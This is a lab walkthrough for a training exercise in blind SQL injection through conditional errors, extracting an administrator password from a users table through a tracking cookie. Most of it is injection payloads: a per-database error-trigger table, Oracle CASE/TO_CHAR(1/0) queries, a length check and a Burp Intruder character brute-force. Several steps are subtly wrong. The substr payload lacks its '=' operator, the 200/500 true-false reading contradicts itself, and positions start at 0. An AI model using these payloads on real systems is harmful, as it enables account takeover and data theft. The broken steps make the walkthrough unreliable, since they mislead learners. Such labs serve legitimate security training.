Problem Statement :
This lab contains a blind SQL injection vulnerability. The application uses a tracking cookie for analytics, and performs an SQL query containing the value of the submitted cookie.
The results of the SQL query are not returned, and the application does not respond any differently based on whether the query returns any rows. If the SQL query causes an error, then the application returns a custom error message.
The database contains a different table called users, with columns called username and password. You need to exploit the blind SQL injection vulnerability to find out the password of the administrator user.
To solve the lab, log in as the administrator user.
Conditional errors
You can test a single boolean condition and trigger a database error if the condition is true.
| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN TO_CHAR(1/0) ELSE NULL END FROM dual |
| Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |
| PostgreSQL | 1 = (SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN CAST(1/0 AS INTEGER) ELSE NULL END) |
| MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),’a’) |
Step by step instruction to resolve this LAB.
- Step 1: is to generate the error.
We will type a single quote in the tracking cookie and send.
TrackingID=X ‘ ;
If we send 2 quotes then the equation is true and it will give us HTTP 200.
TrackingID=X ‘ ‘;
STEP 2: You can test a single boolean condition and trigger a database error if the condition is true.
When one condition is true, and the other one is false then Internal Server is generated.
Note: In the below query, we are saying 1=1 which is true then, we are using to_char(1/0) Function to generate the error.
Query : TrackingId=X’+UNION+SELECT+CASE+When+(1=1)+Then+to_char(1/0)+ELSE+NULL+END+From+dual–;
When both condition is false then response is 200.
Query: TrackingId=X’+UNION+SELECT+CASE+When+(1=2)+Then+to_char(1/0)+ELSE+NULL+END+From+dual–;
STEP 3: Using the above example, we can now verify if the username administrator is available or not. If yes, then error will be generated.
Query:
TrackingId=X’+UNION+SELECT+CASE+When+(username=’administrator’)+Then+to_char(1/0)+ELSE+NULL+END+From+users–
STEP 4: Next we can confirm if the password length is granter than xyz digits. If Answer is true we will HTTP 200 response.
Query : In this below query we set the password length is grater than >19 and we got http 500 in response.
TrackingId=X’+UNION+SELECT+CASE+When+(username=’administrator’+AND+length(password)>19)+Then+to_char(1/0)+ELSE+NULL+END+From+users–;
Query : In this below query we set the password length is grater than >20 and we got http 200 in response. This means the password length is 20 char.
TrackingId=X’+UNION+SELECT+CASE+When+(username=’administrator’+AND+length(password)>20)+Then+to_char(1/0)+ELSE+NULL+END+From+users–;
- STEP 5: We will use SUBSTR Function. In Oracle it is written as
Note : SUBSTRING in SQL is a function used to retrieve characters from a string. With the help of this function, you can retrieve any number of substrings from a single string.
Query : Based on the below query we will be able to find out what is the password.
TrackingId=X’+UNION+SELECT+CASE+When+(username=’administrator’+AND+substr(password,1,1)’a’)+Then+to_char(1/0)+ELSE+NULL+END+From+users–
- STEP 6: We already know the length of the password is 20 char. Now we will setup the payload to find out which char is in which position.
As mentioned above we will be using the substring (password,$1$,1)’$a$’)+, the payload will be set here in the Starting Value of the password and the Character.
Attack type : Cluster Bomb.
It looks like this in BrupSuite > Intruder’s tab.
So this will be 2 payloads.
Payload 1 will be = 0 to 20 numbers.
Payload 2 will be = a to z and 0 to 20 numbers .
Now we start the attack – As you can see I found 20 500 hits which means those are the one which we will be using as our password.
Lab is solved.
Scroll Unlock 